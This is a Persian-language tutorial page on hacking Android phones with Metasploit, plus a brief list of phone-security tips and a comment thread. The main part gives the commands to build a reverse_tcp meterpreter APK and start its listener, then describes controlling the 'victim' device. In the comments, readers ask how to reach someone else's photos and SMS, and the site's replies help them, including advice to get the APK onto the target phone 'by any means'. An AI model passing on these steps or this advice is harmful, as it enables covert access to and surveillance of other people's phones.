در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس میپردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم
در این اموزش هک و امنیت با ما همراه باشید
هک اندروید و امنیت
توضیحات درباره هک اندروید
سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد
متاسپلویت
متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم
اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم
اموزش ویدیو ای هک اندروید و امنیت
اموزش تست نفوذ اندروید
در ابتدا با دستور زیر وارد متاسپلویت شوید
msfconsole
بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید
use android/meterpreter/reverse_tcp
حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید
LHOST 127.0.0.1
و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت ۶۰۶۰ را استفاده میکنیم
LPORT 6060
حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید
generate -t raw -f PentestCore.apk
دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید
use multi/handler
و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم
set PAYLOAD android/meterpreter/reverse_tcp
مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت
و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گزاشت
آموزش امنیت و جلوگیری از هک اندروید
- برای امنیت در سیستم عامل اندروید روش های بسیاری وجود دارد
- از انتی ویروس های اورجینال اندرویدی استفاده کنید
- از نصب برنامه های نامعتبر و کرک شده خود داری کنید
- از دریافت برنامه به غیر از پلی استور خود داری کنید
- بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
- از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
- دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
- پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
دانلود ویدیو اموزشی
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید
چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد
پایدار باشید.
ثبت دیدگاه
- دیدگاه های ارسال شده توسط شما، پس از تایید توسط تیم مدیریت در وب منتشر خواهد شد.
- پیام هایی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
- پیام هایی که به غیر از زبان فارسی یا غیر مرتبط باشد منتشر نخواهد شد.
چطور با این برنامه به عکس و فیلم های شخص دسترسی داشته باشیم
بعد از گرفتن دسترسی میتوانید دستورات خود را اجرا کنید و هر کاری که نیاز دارید انجام بدین
عالیه
ای پی که میگه منظورش چیه دقیقن؟
و به جا ای پی میشه بهش ادرس ایمیل یا تلگرام بدم که اطلاعاتش واسم بیاد؟!
این اموزش برای ساخت پلود Apk است و تست نفوذ با استفاده از فایل Apk میباشد
در بخش ای پی یا ip باید ip سرور برای اتصال کلاینت را وارد کنید
سلام ببخشید من مودمم dlink DWM سیمکارت خور فلاشی هستش ولی زمانی که ایف کانفیگ رو برای \یدا کردن ایبی خودم میزنم در قسمت اول هیچ ایبی ندارم .وقتی هم تو ایرنترنت برس و جو کردم گفتند باید بورت فرواردینگ رو درست کنم و اینا ولی بازم به چیزی نرسیدم و نتوستم از متاسبلویت استفاده کنم اگه میشه راهنمایی کنید ممنون
بهتر است برای تست نفوذ از سرور های مجازی کالی لینوکس استفاده نمایید که امنیت بیشتری داشته باشید و نیازی به پورت فورواردینگ نداشته باشید
در صورتی که میخواهید از طریق سیستم خود انجام دهید در بخش جستجو پورت فورواردینگ را جستجو نمایید و اموزش مورد نظر را مشاهده کنید
سلام خسته نباشید
خوب ما بخوایم مثلا به یه گوشی متصل شیم اونوقت باید چجوری به اون گوشی که مده نظرمونه متصل شیم یعنی بدون اینکه گوشی دسته ما باشه میشه اینکارو کرد؟
درود تشکر
باید فایل apk که ساخته اید را به هر طریقی در سیستم اندرویدی که میخواهید دسترسی داشته باشید نصب نمایید
اقا من بخام به اسم ام اس هاش دسترسی پیدا کنم باید چیکار کنم؟
بعدش که اونو اجرا کرد
چجوری بهش دسترسی پیدا کنم؟
اس ام اسو میگم
درود
با زدن help میتوانید نحوه استفاده از متاسپلویت را مشاهده کنید درصورت امکان اموزشی جداگانه برای نحوه کارکرد متاسپلویت قرار خواهیم داد موفق باشید
سلام
ای پی که باید بزنیمو از کجا بدونیم چیه
درود
از سرور مجازی استفاده کنید هنگام خرید ای پی به شما داده میشود و یا میتوانید ای پی خود را با دستور ifconfig مشاهده نمایید
ببخشید من با vmware
داخل لینوکس شدم رمشم بالای یک گیگ گزاشتم بازم هنگ میکنه چیکار کنم؟
مقدار cpu اختصاص داده شده را بالا ببرید و مقدار رم را در سیستم عادلانه تقسیم کنید و بیشتر از منابع واقعی سیستم نزارید
من با cmd دستور ipconfig زدم دو تا ایپی زده بود یکی مال سیستم یکی مال vmware کدومو باید بزنم
بعد این ایپی هارو باید توی مودم هم port forwarding کنم یا نیازی نیس ؟
از داخل کالی لینوکس ifconfig بزنید و ای پی خود را مشاهده کنید اموزش پورت فورواردینگ هم در سایت جستجو نمایید و مشاهده کنید
با سلام و خسته نباشید
میخاستم بگم که من همه کار هارو انجام دادم برنامرم رو نصب کردم و اجرا کردم
ولی توی ترمینال چیزی نمیاد فقط مینویسه که
started revers tcp handler on 192.168.28.131:3030
چیکار کنم؟؟؟
درود و تشکر
شما مشکل در شبکه خود دارید درصورتی که از مجازی ساز ها استفاده میکنید network را بر روی NAT بگذارید و ای پی خود را درست وارد کنید و دقت داشته باشید دستگاه اندروید به شبکه داخلی یا خارجی شما متصل باشد
ببخشید ولی شبکه داخلی یا خارجی یعنی ب مودم من وصل باشه؟
شبکه داخلی زمانی است که مودم شما یک شبکه NAT ایجاد کرده باشد و شما در داخل یک شبکه خانگی قرار دارید و فقط میتوانید ارتباط بین دستگاه های متصل به ان شبکه برقرار کنید
شبکه خارجی شبکه بیرونی اینترنت است که هر زمان به اینترنت وصل باشید میتوانید به دستگاه متصل شوید و ازتباط از طریق شبکه جهانی اینترنت برقرار است
سلام ببخشید من برنامه رو ساختم ولی مجبور شدم از ترمینال خارج بشم و سیستم رو خاموش کنم الان که روشن کردم هر چی میزنم exploit چیزی نمیاد لطفا راهنماییم کنید خیلی مهمه.اگه میشه بفرستید به ایمیلم جواب مشکل رو
درود
در شبکه داخلی شما با خاموش و رشن شدن سیستم ممکن است ای پی ها در هر دستگاه تغیر کند و برای ثابت بودن کلاینت باید از no ip یا سرور مجازی استفاده نمایید که اموزش ها در سایت موجود است
دوتا مشکل دارم
اولیش: برای ثابت بودن ایپی ، چطور میشه از noip در متاسپلویت استفاده کرد؟ ( نحوه استفاده اش برای رات های اماده رو بلدم ولی برای متاسپلویت نه، اگه میتونی ی اموزش کوتاه براش بذار)
دومیش:برای هک در ماشین مجازی،بعد از port forwarding حتما باید فایروال سیستم هم غیرفعال بشه؟ اگه اره، تو کالی لینوکس چطور باید این کار رو کرد؟؟؟
درود
اموزش no ip در سایت قرار دارد و در صورت امکان برای متاسپلویت هم قرار خواهد گرفت
در صورت خارج شدن دوباره چجوری میتونیم به این قسمت دسترسی داشته باشیم
درود
با هر بار وارد شدن به حساب کاربری خود میتوانید به این اموزش دسترسی داشته باشید
من دسترسی گرفتم لطفا دستورات عملی دسترسی به همه ی نقاط اندروید رو هم بذارید ممنون میشم
درود
مستوانید سویچ های راهنمارا مشاهده کنید
بزودی اموزشی برای نحوه کنترل اندروید با این روش را قرار میدهیم